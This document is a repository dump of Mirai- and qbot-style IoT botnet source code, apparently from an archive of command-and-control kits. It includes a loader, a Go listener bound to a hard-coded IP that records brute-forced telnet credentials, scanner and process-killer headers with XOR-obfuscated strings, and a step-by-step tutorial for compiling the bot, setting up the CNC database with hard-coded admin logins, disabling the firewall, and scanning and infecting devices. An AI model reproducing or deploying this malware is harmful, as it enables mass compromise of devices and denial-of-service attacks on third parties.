((conn = strtok(str, " ")) == NULL) 33 | return NULL; 34 | if ((auth = strtok(NULL, " ")) == NULL) 35 | return NULL; 36 | arch = strtok(NULL, " "); // We don't care if we don't know the arch 37 | 38 | if ((addr_str = strtok(conn, ":")) == NULL) 39 | return NULL; 40 | if ((port_str = strtok(NULL, ":")) == NULL) 41 | return NULL; 42 | 43 | if (strlen(auth) == 1) 44 | { 45 | if (auth[0] == ':') 46 | { 47 | user = ""; 48 | pass = ""; 49 | } 50 | else if (auth[0] != '?') 51 | return NULL; 52 | } 53 | else 54 | { 55 | user = strtok(auth, ":"); 56 | pass = strtok(NULL, ":"); 57 | } 58 | 59 | addr = inet_addr(addr_str); 60 | port = htons(atoi(port_str)); 61 | 62 | return telnet_info_new(user, pass, arch, addr, port, out); 63 | } 64 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/loader/src/util.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "headers/includes.h" 9 | #include "headers/util.h" 10 | #include "headers/server.h" 11 | 12 | void hexDump (char *desc, void *addr, int len) { 13 | int i; 14 | unsigned char buff[17]; 15 | unsigned char *pc = (unsigned char*)addr; 16 | 17 | // Output description if given. 18 | if (desc != NULL) 19 | printf ("%s:\n", desc); 20 | 21 | if (len == 0) { 22 | printf(" ZERO LENGTH\n"); 23 | return; 24 | } 25 | if (len < 0) { 26 | printf(" NEGATIVE LENGTH: %i\n",len); 27 | return; 28 | } 29 | 30 | // Process every byte in the data. 31 | for (i = 0; i < len; i++) { 32 | // Multiple of 16 means new line (with line offset). 33 | 34 | if ((i % 16) == 0) { 35 | // Just don't print ASCII for the zeroth line. 36 | if (i != 0) 37 | printf (" %s\n", buff); 38 | 39 | // Output the offset. 40 | printf (" %04x ", i); 41 | } 42 | 43 | // Now the hex code for the specific character. 44 | printf (" %02x", pc[i]); 45 | 46 | // And store a printable ASCII character for later. 47 | if ((pc[i] < 0x20) || (pc[i] > 0x7e)) 48 | buff[i % 16] = '.'; 49 | else 50 | buff[i % 16] = pc[i]; 51 | buff[(i % 16) + 1] = '\0'; 52 | } 53 | 54 | // Pad out last line if not exactly 16 characters. 55 | while ((i % 16) != 0) { 56 | printf (" "); 57 | i++; 58 | } 59 | 60 | // And print the final ASCII bit. 61 | printf (" %s\n", buff); 62 | } 63 | 64 | int util_socket_and_bind(struct server *srv) 65 | { 66 | struct sockaddr_in bind_addr; 67 | int i, fd, start_addr; 68 | BOOL bound = FALSE; 69 | 70 | if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1) 71 | return -1; 72 | 73 | bind_addr.sin_family = AF_INET; 74 | bind_addr.sin_port = 0; 75 | 76 | // Try to bind on the first available address 77 | start_addr = rand() % srv->bind_addrs_len; 78 | for (i = 0; i < srv->bind_addrs_len; i++) 79 | { 80 | bind_addr.sin_addr.s_addr = srv->bind_addrs[start_addr]; 81 | if (bind(fd, (struct sockaddr *)&bind_addr, sizeof (struct sockaddr_in)) == -1) 82 | { 83 | if (++start_addr == srv->bind_addrs_len) 84 | start_addr = 0; 85 | } 86 | else 87 | { 88 | bound = TRUE; 89 | break; 90 | } 91 | } 92 | if (!bound) 93 | { 94 | close(fd); 95 | #ifdef DEBUG 96 | printf("Failed to bind on any address\n"); 97 | #endif 98 | return -1; 99 | } 100 | 101 | // Set the socket in nonblocking mode 102 | if (fcntl(fd, F_SETFL, fcntl(fd, F_GETFL, 0) | O_NONBLOCK) == -1) 103 | { 104 | #ifdef DEBUG 105 | printf("Failed to set socket in nonblocking mode. This will have SERIOUS performance implications\n"); 106 | #endif 107 | } 108 | return fd; 109 | } 110 | 111 | int util_memsearch(char *buf, int buf_len, char *mem, int mem_len) 112 | { 113 | int i, matched = 0; 114 | 115 | if (mem_len > buf_len) 116 | return -1; 117 | 118 | for (i = 0; i < buf_len; i++) 119 | { 120 | if (buf[i] == mem[matched]) 121 | { 122 | if (++matched == mem_len) 123 | return i + 1; 124 | } 125 | else 126 | matched = 0; 127 | } 128 | 129 | return -1; 130 | } 131 | 132 | int util_printfile(char *input, char *output) { 133 | FILE *file; 134 | const char* data = input; 135 | const char* filename = output; 136 | const char* mode = "a+"; 137 | file = fopen(filename, mode); 138 | if(file == NULL) 139 | printf("file wouldnt open yo like wtf\r\n"); 140 | fprintf(file, "%s\n", data); 141 | fflush(file); 142 | fclose(file); 143 | } 144 | 145 | BOOL util_sockprintf(int fd, const char *fmt, ...) 146 | { 147 | char buffer[BUFFER_SIZE + 2]; 148 | va_list args; 149 | int len; 150 | 151 | va_start(args, fmt); 152 | len = vsnprintf(buffer, BUFFER_SIZE, fmt, args); 153 | va_end(args); 154 | 155 | if (len > 0) 156 | { 157 | if (len > BUFFER_SIZE) 158 | len = BUFFER_SIZE; 159 | 160 | #ifdef DEBUG 161 | hexDump("TELOUT", buffer, len); 162 | #endif 163 | if (send(fd, buffer, len, MSG_NOSIGNAL) != len) 164 | return FALSE; 165 | } 166 | 167 | return TRUE; 168 | } 169 | 170 | char *util_trim(char *str) 171 | { 172 | char *end; 173 | 174 | while(isspace(*str)) 175 | str++; 176 | 177 | if(*str == 0) 178 | return str; 179 | 180 | end = str + strlen(str) - 1; 181 | while(end > str && isspace(*end)) 182 | end--; 183 | 184 | *(end+1) = 0; 185 | 186 | return str; 187 | } 188 | -------------------------------------------------------------------------------- /Hybridd/Hybrid/scanListen.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | "fmt" 5 | "net" 6 | "encoding/binary" 7 | "errors" 8 | "os" 9 | "time" 10 | "log" 11 | ) 12 | 13 | func main() { 14 | l, err := net.Listen("tcp", "45.77.61.41:1676") 15 | if err != nil { 16 | fmt.Println(err) 17 | return 18 | } 19 | 20 | for { 21 | conn, err := l.Accept() 22 | if err != nil { 23 | break 24 | } 25 | go handleConnection(conn) 26 | } 27 | } 28 | 29 | func handleConnection(conn net.Conn) { 30 | defer conn.Close() 31 | conn.SetDeadline(time.Now().Add(10 * time.Second)) 32 | 33 | bufChk, err := readXBytes(conn, 1) 34 | if err != nil { 35 | return 36 | } 37 | 38 | var ipInt uint32 39 | var portInt uint16 40 | 41 | if bufChk[0] == 0 { 42 | ipBuf, err := readXBytes(conn, 4) 43 | if err != nil { 44 | return 45 | } 46 | ipInt = binary.BigEndian.Uint32(ipBuf) 47 | 48 | portBuf, err := readXBytes(conn, 2) 49 | if err != nil { 50 | return; 51 | } 52 | 53 | portInt = binary.BigEndian.Uint16(portBuf) 54 | } else { 55 | ipBuf, err := readXBytes(conn, 3) 56 | if err != nil { 57 | return; 58 | } 59 | ipBuf = append(bufChk, ipBuf...) 60 | 61 | ipInt = binary.BigEndian.Uint32(ipBuf) 62 | 63 | portInt = 23 64 | } 65 | 66 | uLenBuf, err := readXBytes(conn, 1) 67 | if err != nil { 68 | return 69 | } 70 | usernameBuf, err := readXBytes(conn, int(byte(uLenBuf[0]))) 71 | 72 | pLenBuf, err := readXBytes(conn, 1) 73 | if err != nil { 74 | return 75 | } 76 | passwordBuf, err := readXBytes(conn, int(byte(pLenBuf[0]))) 77 | if err != nil { 78 | return 79 | } 80 | file, err := os.OpenFile("sl_list.txt", os.O_RDWR|os.O_APPEND|os.O_CREATE, 0666) 81 | if err != nil { 82 | log.Fatal("Cannot create file", err) 83 | } 84 | defer file.Close() 85 | fmt.Printf("%d.%d.%d.%d:%d %s:%s\n", (ipInt >> 24) & 0xff, (ipInt >> 16) & 0xff, (ipInt >> 8) & 0xff, ipInt & 0xff, portInt, string(usernameBuf), string(passwordBuf)) 86 | 87 | fmt.Fprintf(file, "%d.%d.%d.%d:%d %s:%s\n", (ipInt >> 24) & 0xff, (ipInt >> 16) & 0xff, (ipInt >> 8) & 0xff, ipInt & 0xff, portInt, string(usernameBuf), string(passwordBuf)) 88 | } 89 | 90 | func readXBytes(conn net.Conn, amount int) ([]byte, error) { 91 | buf := make([]byte, amount) 92 | tl := 0 93 | 94 | for tl < amount { 95 | rd, err := conn.Read(buf[tl:]) 96 | if err != nil || rd <= 0 { 97 | return nil, errors.New("Failed to read") 98 | } 99 | tl += rd 100 | } 101 | 102 | return buf, nil 103 | } -------------------------------------------------------------------------------- /Hybridd/Hybridd.rar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/injectionmethod/Disgusting-CNC-Archives/ff8de57d70a77fc3b3473a06401ffd0b6a5b00e1/Hybridd/Hybridd.rar -------------------------------------------------------------------------------- /Hybridd/tutut.txt: -------------------------------------------------------------------------------- 1 | ***************************** 2 | Discord: Div#2362 3 | Youtube: Logic Net 4 | ***************************** 5 | ______________________________________________________________ 6 | 7 | Run These Commands 8 | 1. 9 | yum update -y 10 | yum install epel-release -y 11 | yum groupinstall "Development Tools" -y 12 | yum install gmp-devel -y 13 | ln -s /usr/lib64/libgmp.so.3 /usr/lib64/libgmp.so.10 14 | yum install screen wget bzip2 gcc nano gcc-c++ electric-fence sudo git libc6-dev httpd xinetd tftpd tftp-server mysql mysql-server gcc glibc-static -y 15 | 16 | mkdir /etc/xcompile 17 | cd /etc/xcompile 18 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 19 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 20 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 21 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 22 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 23 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 24 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 25 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 26 | wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 27 | wget http://distro.ibiblio.org/slitaz/sources/packages/c/cross-compiler-armv6l.tar.bz2 28 | wget https://landley.net/aboriginal/downloads/old/binaries/1.2.6/cross-compiler-armv7l.tar.bz2 29 | 30 | tar -jxf cross-compiler-i586.tar.bz2 31 | tar -jxf cross-compiler-m68k.tar.bz2 32 | tar -jxf cross-compiler-mips.tar.bz2 33 | tar -jxf cross-compiler-mipsel.tar.bz2 34 | tar -jxf cross-compiler-powerpc.tar.bz2 35 | tar -jxf cross-compiler-sh4.tar.bz2 36 | tar -jxf cross-compiler-sparc.tar.bz2 37 | tar -jxf cross-compiler-armv4l.tar.bz2 38 | tar -jxf cross-compiler-armv5l.tar.bz2 39 | tar -jxf cross-compiler-armv6l.tar.bz2 40 | tar -jxf cross-compiler-armv7l.tar.bz2 41 | rm -rf *.tar.bz2 42 | mv cross-compiler-i586 i586 43 | mv cross-compiler-m68k m68k 44 | mv cross-compiler-mips mips 45 | mv cross-compiler-mipsel mipsel 46 | mv cross-compiler-powerpc powerpc 47 | mv cross-compiler-sh4 sh4 48 | mv cross-compiler-sparc sparc 49 | mv cross-compiler-armv4l armv4l 50 | mv cross-compiler-armv5l armv5l 51 | mv cross-compiler-armv6l armv6l 52 | mv cross-compiler-armv7l armv7l 53 | 54 | cd /tmp 55 | wget https://dl.google.com/go/go1.13.5.linux-amd64.tar.gz 56 | tar -xvf go1.13.5.linux-amd64.tar.gz 57 | mv go /usr/local 58 | export GOROOT=/usr/local/go 59 | export GOPATH=$HOME/Projects/Proj1 60 | export PATH=$GOPATH/bin:$GOROOT/bin:$PATH 61 | go version 62 | go env 63 | cd ~/ 64 | go get github.com/go-sql-driver/mysql 65 | go get github.com/mattn/go-shellwords 66 | 67 | 134.122.51.236 68 | 69 | ================================================= 70 | 3. 71 | // Now after that we have to setup the bot. 72 | // Change the other ips with your server IP. 73 | CHANGE IP(s) IN /dlr/main.c 74 | CHANGE IP(s) IN /stuff/thinkphp.c 75 | CHANGE IP(s) IN /stuff/stuff/includes.h -> For example your server ip is 127.0.0.1 the format should be (127.0.0.1) 76 | CHANGE IP(s) IN /telnet/src/headers/config.h -> For example your server ip is 127.0.0.1 the format should be (127.0.0.1) 77 | CHANGE IP(s) IN ui/m.go -> make sure the username and the password are "root" 78 | -------------------------------------------------------------- 79 | //Now We Just The Ip(s) To You Server We Can Start Database 80 | =============================================================== 81 | 82 | 83 | We will setup the database, run these commands on your terminal: 84 | 3. 85 | service mysqld start 86 | mysql_secure_installation 87 | ------------------------- 88 | Now Login with your mysql pass by running this command: 89 | ========================== 90 | 91 | 4. 92 | mysql -u root -p 93 | =============== 94 | 95 | 5. 96 | use mysql 97 | GRANT ALL ON *.* to root@'%' IDENTIFIED BY 'root'; 98 | FLUSH PRIVILEGES; 99 | 100 | CREATE DATABASE dirtzbeta; 101 | use dirtzbeta; 102 | CREATE TABLE `history` ( 103 | `id` int(10) unsigned NOT NULL AUTO_INCREMENT, 104 | `user_id` int(10) unsigned NOT NULL, 105 | `time_sent` int(10) unsigned NOT NULL, 106 | `duration` int(10) unsigned NOT NULL, 107 | `command` text NOT NULL, 108 | `max_bots` int(11) DEFAULT '-1', 109 | PRIMARY KEY (`id`), 110 | KEY `user_id` (`user_id`) 111 | ); 112 | 113 | CREATE TABLE `users` ( 114 | `id` int(10) unsigned NOT NULL AUTO_INCREMENT, 115 | `username` varchar(32) NOT NULL, 116 | `password` varchar(32) NOT NULL, 117 | `duration_limit` int(10) unsigned DEFAULT NULL, 118 | `cooldown` int(10) unsigned NOT NULL, 119 | `wrc` int(10) unsigned DEFAULT NULL, 120 | `last_paid` int(10) unsigned NOT NULL, 121 | `max_bots` int(11) DEFAULT '-1', 122 | `admin` int(10) unsigned DEFAULT '0', 123 | `intvl` int(10) unsigned DEFAULT '30', 124 | `api_key` text, 125 | PRIMARY KEY (`id`), 126 | KEY `username` (`username`) 127 | ); 128 | 129 | CREATE TABLE `whitelist` ( 130 | `id` int(10) unsigned NOT NULL AUTO_INCREMENT, 131 | `prefix` varchar(16) DEFAULT NULL, 132 | `netmask` tinyint(3) unsigned DEFAULT NULL, 133 | PRIMARY KEY (`id`), 134 | KEY `prefix` (`prefix`) 135 | ); 136 | INSERT INTO users VALUES (NULL, 'logic', 'logic1312', 0, 0, 0, 0, -1, 1, 30, ''); 137 | INSERT INTO users VALUES (NULL, 'paranojaa', 'paranoja1312', 0, 0, 0, 0, -1, 1, 30, ''); 138 | 139 | CREATE TABLE `logins` ( 140 | `id` int(11) NOT NULL, 141 | `username` varchar(32) NOT NULL, 142 | `action` varchar(32) NOT NULL, 143 | `ip` varchar(15) NOT NULL, 144 | `timestamp` timestamp NOT NULL DEFAULT CURRENT_TIMESTAMP 145 | ) ENGINE=InnoDB DEFAULT CHARSET=latin1; 146 | exit; 147 | ----------------------------------------------------------- 148 | ^^^^^^^^ ^^^^^^^^ 149 | PUT YOUR USERNAME AND PASSWORD HERE 150 | Replace "MYSQLPASSHERE" with your mysql pass you made 151 | Now your database is complete, we will restart and disable services: 152 | =========================================================== 153 | 154 | 155 | 5. 156 | service iptables stop 157 | service httpd restart 158 | service mysqld restart 159 | ----------------------- 160 | Alright, we have to compile the bot and screen the cnc server by doing this: 161 | ====================== 162 | 163 | 164 | 6. 165 | cd ~/ 166 | chmod 0777 * -R 167 | sh build.sh 168 | ================= 169 | 170 | 171 | 7. 172 | nano /usr/include/bits/typesizes.h 173 | ----------------------------------- 174 | using your down arrow scroll down and edit the 1024 to 999999 175 | THEN SAVE IT CTRL X Y Enter 176 | ======================================== 177 | 178 | 179 | 8. 180 | screen ./cnc 181 | ----------- 182 | Screen Should Go Black And Say somthing like this in light purple 183 | 184 | [ Mana Ouma Bot Mirai Variant ] 185 | 186 | Press And Hold CTRL And Press A And Then D 187 | 188 | So CTRL+A+D 189 | Screen Should Go Back To How It Was 190 | ================================================ 191 | 192 | 193 | 194 | Now You Massive Boatnet Is Set Up Time To Use It!! 195 | ------------------------------------------------------ 196 | To Use The Net Open Putty, 197 | 198 | For "host" | server ip | 199 | 200 | Set the cnc "port" as | 1791 | 201 | 202 | "Connection Type" | Telnet | 203 | 204 | Discord: Reborn.Shad0w#6512 205 | Instagram: @Reborn.Shad0w 206 | Youtube: Reborn. Shad0w 207 | 208 | 209 | [ Scanning TuT] 210 | 211 | 0. 212 | drag a vuln list in the "telnet" folder 213 | 214 | 1. 215 | type the following commands 216 | 217 | 2. 218 | cd telnet/ 219 | 220 | 3. 221 | ulimit -e999999 222 | 223 | 4. 224 | cat (Name Of List) | ./telnet 225 | 226 | 227 | [ Rooting Servers To ManaV4.1 ] 228 | 229 | 1. 230 | Get A (root access) Vps (Not Being Used) 231 | 232 | 2. 233 | copy&Paste The Mana Payload 234 | 235 | 3. 236 | Paste&Enter The Payload Into The Vps 237 | 238 | 239 | IMPORTANT!!!!!! 240 | After "python ManaPayload.py", when it is finished THERE SHOULD BE SOME TEXT SAYING 241 | "Your Payload" 242 | YOU NEED TO COPY THIS TEXT, YOU WILL NEED IT WHEN YOU Root Servers (If You Want) 243 | _______________________________________________________________________________________ -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/checksum.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | 6 | #include "headers/includes.h" 7 | #include "headers/checksum.h" 8 | 9 | uint16_t checksum_generic(uint16_t *addr, uint32_t count) 10 | { 11 | register unsigned long sum = 0; 12 | 13 | for(sum = 0; count > 1; count -= 2) 14 | sum += *addr++; 15 | if(count == 1) 16 | sum += (char)*addr; 17 | 18 | sum = (sum >> 16) + (sum & 0xFFFF); 19 | sum += (sum >> 16); 20 | 21 | return ~sum; 22 | } 23 | 24 | uint16_t checksum_tcpudp(struct iphdr *iph, void *buff, uint16_t data_len, int len) 25 | { 26 | const uint16_t *buf = buff; 27 | uint32_t ip_src = iph->saddr; 28 | uint32_t ip_dst = iph->daddr; 29 | uint32_t sum = 0; 30 | int length = len; 31 | 32 | while(len > 1) 33 | { 34 | sum += *buf; 35 | buf++; 36 | len -= 2; 37 | } 38 | 39 | if(len == 1) 40 | sum += *((uint8_t *) buf); 41 | 42 | sum += (ip_src >> 16) & 0xFFFF; 43 | sum += ip_src & 0xFFFF; 44 | sum += (ip_dst >> 16) & 0xFFFF; 45 | sum += ip_dst & 0xFFFF; 46 | sum += htons(iph->protocol); 47 | sum += data_len; 48 | 49 | while(sum >> 16) 50 | sum = (sum & 0xFFFF) + (sum >> 16); 51 | 52 | return ((uint16_t) (~sum)); 53 | } 54 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/headers/checksum.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | 6 | #include "includes.h" 7 | 8 | uint16_t checksum_generic(uint16_t *, uint32_t); 9 | uint16_t checksum_tcpudp(struct iphdr *, void *, uint16_t, int); 10 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/headers/includes.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | 7 | #define FALSE 0 8 | #define TRUE 1 9 | #define STDOUT 1 10 | 11 | typedef char BOOL; 12 | 13 | #define INET_ADDR(o1,o2,o3,o4) (htonl((o1 << 24) | (o2 << 16) | (o3 << 8) | (o4 << 0))) 14 | 15 | typedef uint32_t ipv4_t; 16 | typedef uint16_t port_t; 17 | ipv4_t LOCAL_ADDR; 18 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/headers/killer.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | #define KILLER_MIN_PID 400 6 | #define KILLER_RESTART_SCAN_TIME 600 7 | 8 | #define upx_scan_match 9 | 10 | #ifdef KILLER 11 | void killer_init(void); 12 | void killer_kill(void); 13 | BOOL killer_kill_by_port(port_t); 14 | #endif 15 | 16 | static BOOL has_exe_access(void); 17 | static BOOL memory_scan_match(char *); 18 | static BOOL status_upx_check(char *, char *); 19 | static BOOL mem_exists(char *, int, char *, int); 20 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/headers/rand.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | #include 3 | 4 | #define PHI 0x9e3779b9 5 | void rand_init(void); 6 | uint32_t rand_next(void); 7 | void rand_alpha_str(uint8_t *, int); 8 | void rand_str(char *, int ); 9 | 10 | 11 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/headers/scanner.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | 5 | #include "includes.h" 6 | 7 | #ifdef SERVER 8 | #define SCANNER_MAX_CONNS 320 9 | #define SCANNER_RAW_PPS 820 10 | #elif YARN 11 | #define SCANNER_MAX_CONNS 280 12 | #define SCANNER_RAW_PPS 780 13 | #else 14 | #define SCANNER_MAX_CONNS 216 15 | #define SCANNER_RAW_PPS 744 16 | #endif 17 | 18 | #define SCANNER_RDBUF_SIZE 1080 19 | #define SCANNER_HACK_DRAIN 64 20 | 21 | struct scanner_auth { 22 | char *username; 23 | char *password; 24 | uint16_t weight_min, weight_max; 25 | uint8_t username_len, password_len; 26 | }; 27 | 28 | struct scanner_connection { 29 | struct scanner_auth *auth; 30 | int fd, last_recv; 31 | enum { 32 | SC_CLOSED, 33 | SC_CONNECTING, 34 | SC_HANDLE_IACS, 35 | SC_WAITING_USERNAME, 36 | SC_WAITING_PASSWORD, 37 | SC_WAITING_PASSWD_RESP, 38 | SC_WAITING_ENABLE_RESP, 39 | SC_WAITING_SYSTEM_RESP, 40 | SC_WAITING_LINUXSHELL_RESP, 41 | SC_WAITING_BAH_RESP, 42 | SC_WAITING_SHELL_RESP, 43 | SC_WAITING_SH_RESP, 44 | SC_WAITING_TOKEN_RESP 45 | } state; 46 | ipv4_t dst_addr; 47 | uint16_t dst_port; 48 | int rdbuf_pos; 49 | char rdbuf[SCANNER_RDBUF_SIZE]; 50 | uint8_t tries; 51 | }; 52 | 53 | void rep_init(); 54 | 55 | static void setup_connection(struct scanner_connection *); 56 | static ipv4_t get_random_ip(void); 57 | 58 | static int consume_iacs(struct scanner_connection *); 59 | static int consume_any_prompt(struct scanner_connection *); 60 | static int consume_user_prompt(struct scanner_connection *); 61 | static int consume_pass_prompt(struct scanner_connection *); 62 | static int consume_resp_prompt(struct scanner_connection *); 63 | 64 | static void add_auth_entry(char *, char *, uint16_t); 65 | static struct scanner_auth *random_auth_entry(void); 66 | static void report_working(ipv4_t, uint16_t, struct scanner_auth *); 67 | static char *deobf(char *, int *); 68 | static BOOL can_consume(struct scanner_connection *, uint8_t *, int); 69 | 70 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/headers/util.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include "includes.h" 4 | 5 | int util_strlen(char *); 6 | BOOL util_strcmp(char *, char *); 7 | int util_strcpy(char *, char *); 8 | void util_memcpy(void *, void *, int); 9 | void util_zero(void *, int); 10 | int util_atoi(char *, int); 11 | char *util_itoa(int, int, char *); 12 | int util_memsearch(char *, int, char *, int); 13 | int util_stristr(char *, int, char *); 14 | ipv4_t util_local_addr(void); 15 | char *util_fdgets(char *, int, int); 16 | 17 | static inline int util_isupper(char); 18 | static inline int util_isalpha(char); 19 | static inline int util_isspace(char); 20 | static inline int util_isdigit(char); 21 | 22 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/headers/xor.h: -------------------------------------------------------------------------------- 1 | #pragma once 2 | 3 | #include 4 | #include 5 | #include 6 | struct table_value 7 | { 8 | char *val; 9 | uint16_t val_len; 10 | }; 11 | 12 | /* Defining Table Keys */ 13 | #define XOR_SCAN_PORT 1 14 | 15 | #define XOR_NULL 2 16 | 17 | #define XOR_IOCTL_WATCH1 3 18 | #define XOR_IOCTL_WATCH2 4 19 | #define XOR_IOCTL_WATCH3 5 20 | #define XOR_IOCTL_WATCH4 6 21 | #define XOR_IOCTL_WATCH5 7 22 | 23 | #define XOR_SCAN_SHELL 10 24 | #define XOR_SCAN_ENABLE 11 25 | #define XOR_SCAN_SYSTEM 12 26 | #define XOR_SCAN_LINUXSHELL 13 27 | #define XOR_SCAN_BAH 14 28 | #define XOR_SCAN_SH 15 29 | 30 | #define XOR_SCAN_NCORRECT 16 31 | #define XOR_SCAN_OGIN 17 32 | #define XOR_SCAN_ENTER 18 33 | #define XOR_SCAN_ASSWORD 19 34 | 35 | #define XOR_SCAN_QUERY 20 36 | #define XOR_SCAN_RESP 21 37 | 38 | #define XOR_KILL_PROC 22 39 | #define XOR_KILL_EXE 23 40 | #define XOR_KILL_FD 24 41 | #define XOR_KILL_MAPS 25 42 | #define XOR_KILL_TCP 26 43 | 44 | #define XOR_MEM_HTTP 27 45 | #define XOR_MEM_QBOT1 28 46 | #define XOR_MEM_QBOT2 29 47 | #define XOR_MEM_QBOT3 30 48 | #define XOR_MEM_MIRAI 31 49 | #define XOR_MEM_SELF_EXE 32 50 | #define XOR_MEM_UPX 33 51 | #define XOR_MEM_ROUTE 34 52 | #define XOR_MEM_RC 35 53 | #define XOR_MEM_BINSH 36 54 | 55 | #define XOR_EXEC_SUCCESS 37 56 | #define XOR_RANDOM 38 57 | 58 | #define MAX_XOR_KEYS 39 59 | 60 | 61 | void table_init(void); 62 | void table_unlock_val(uint8_t); 63 | void table_lock_val(uint8_t); 64 | char *table_retrieve_val(int, int *); 65 | 66 | static void add_entry(uint8_t, char *, int); 67 | static void toggle_obf(uint8_t); 68 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/rand.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #include 4 | #include 5 | #include 6 | #include 7 | #include 8 | #include "headers/includes.h" 9 | #include "headers/rand.h" 10 | #include "headers/xor.h" 11 | #include "headers/util.h" 12 | static uint32_t x, y, z, w; 13 | 14 | void rand_init(void) 15 | { 16 | x = time(NULL); 17 | y = getpid() ^ getppid(); 18 | z = clock(); 19 | w = z ^ y; 20 | } 21 | uint32_t rand_next(void) 22 | { 23 | uint32_t t = x; 24 | t ^= t << 11; 25 | t ^= t >> 8; 26 | x = y; y = z; z = w; 27 | w ^= w >> 19; 28 | w ^= t; 29 | return w; 30 | } 31 | 32 | void rand_alpha_str(uint8_t *str, int len) 33 | { 34 | table_unlock_val(XOR_RANDOM); 35 | char alpha_set[64]; 36 | strcpy(alpha_set,table_retrieve_val(XOR_RANDOM, NULL)); 37 | while(len--) 38 | *str++ = alpha_set[rand_next() % util_strlen(alpha_set)]; 39 | table_lock_val(XOR_RANDOM); 40 | } 41 | 42 | void rand_str(char *str, int len) 43 | { 44 | while (len > 0) 45 | { 46 | if (len >= 4) 47 | { 48 | *((uint32_t *)str) = rand_next(); 49 | str += sizeof (uint32_t); 50 | len -= sizeof (uint32_t); 51 | } 52 | else if (len >= 2) 53 | { 54 | *((uint16_t *)str) = rand_next() & 0xFFFF; 55 | str += sizeof (uint16_t); 56 | len -= sizeof (uint16_t); 57 | } 58 | else 59 | { 60 | *str++ = rand_next() & 0xFF; 61 | len--; 62 | } 63 | } 64 | } 65 | 66 | 67 | 68 | -------------------------------------------------------------------------------- /Roxy Shitbot/Roxy qbot/bot/util.c: -------------------------------------------------------------------------------- 1 | #define _GNU_SOURCE 2 | 3 | #ifdef DEBUG 4 | #include 5 | #endif 6 | #include 7 | #include 8 | #include 9 | #include 10 | #include 11 | #include 12 | #include 13 | #include 14 | #include 15 | #include 16 | 17 | #include "headers/includes.h" 18 | #include "headers/util.h" 19 | 20 | int util_strlen(char *str) 21 | { 22 | int c = 0; 23 | 24 | while(*str++ != 0) 25 | c++; 26 | 27 | return c; 28 | } 29 | 30 | BOOL util_strcmp(char *str1, char *str2) 31 | { 32 | int l1 = util_strlen(str1), l2 = util_strlen(str2); 33 | 34 | if(l1 != l2) 35 | return FALSE; 36 | 37 | while(l1--) 38 | { 39 | if(*str1++ != *str2++) 40 | return FALSE; 41 | } 42 | 43 | return TRUE; 44 | } 45 | 46 | int util_strcpy(char *dst, char *src) 47 | { 48 | int l = util_strlen(src); 49 | 50 | util_memcpy(dst, src, l + 1); 51 | 52 | return l; 53 | } 54 | 55 | void util_memcpy(void *dst, void *src, int len) 56 | { 57 | char *r_dst = (char *)dst; 58 | char *r_src = (char *)src; 59 | while(len--) 60 | *r_dst++ = *r_src++; 61 | } 62 | 63 | void util_zero(void *buf, int len) 64 | { 65 | char *zero = buf; 66 | while(len--) 67 | *zero++ = 0; 68 | } 69 | 70 | int util_atoi(char *str, int base) 71 | { 72 | unsigned long acc = 0; 73 | int c; 74 | unsigned long cutoff; 75 | int neg = 0, any, cutlim; 76 | 77 | do 78 | { 79 | c = *str++; 80 | } 81 | while(util_isspace(c)); 82 | 83 | if(c == '-') 84 | { 85 | neg = 1; 86 | c = *str++; 87 | } 88 | else if(c == '+') 89 | c = *str++; 90 | 91 | cutoff = neg ? -(unsigned long)LONG_MIN : LONG_MAX; 92 | cutlim = cutoff % (unsigned long)base; 93 | cutoff /= (unsigned long)base; 94 | for(acc = 0, any = 0;; c = *str++) 95 | { 96 | if(util_isdigit(c)) 97 | c -= '0'; 98 | else if(util_isalpha(c)) 99 | c -= util_isupper(c) ? 'A' - 10 : 'a' - 10; 100 | else 101 | break; 102 | 103 | if(c >= base) 104 | break; 105 | 106 | if(any < 0 || acc > cutoff || acc == cutoff && c > cutlim) 107 | any = -1; 108 | else 109 | { 110 | any = 1; 111 | acc *= base; 112 | acc += c; 113 | } 114 | } 115 | 116 | if(any < 0) 117 | { 118 | acc = neg ? LONG_MIN : LONG_MAX; 119 | } 120 | else if(neg) 121 | acc = 